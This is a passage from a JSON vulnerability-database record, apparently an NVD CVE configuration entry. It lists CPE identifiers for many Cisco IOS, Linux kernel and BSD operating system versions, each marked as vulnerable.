                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xh2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)by:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)mb13c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ey2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sed:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)ewa2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xl4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.46:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zo:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ye:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xc4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)t3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(15\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)xy4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(7\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.45:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.56:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:4.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:dragonflybsd:dragonflybsd:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.8:p7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6.1:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6.1:p4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.8:p6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6.1:p7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3ha:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8.9\\)sa6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(26\\)p2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(22b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(17\\)cc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(26b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(9\\)ia:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)sl4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(22\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)s5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(24\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28\\)w5\\(31a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)s3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(27\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3.4\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0da:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0w5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)e3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ez1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)sx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(24\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3.2\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)dc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(8a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11b\\)e12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(27b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1sec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)jk5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8\\)ea1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5a\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3a\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1.1\\)pi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)t14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12\\)da8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(10\\)da4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zj3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zj2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)ea4a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7a\\)ey:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)e8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)ex4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)jk2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sy1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xb15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)t6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(23.6\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)yy3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ewa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2jk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)bc3c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1.4\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(16\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xi1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
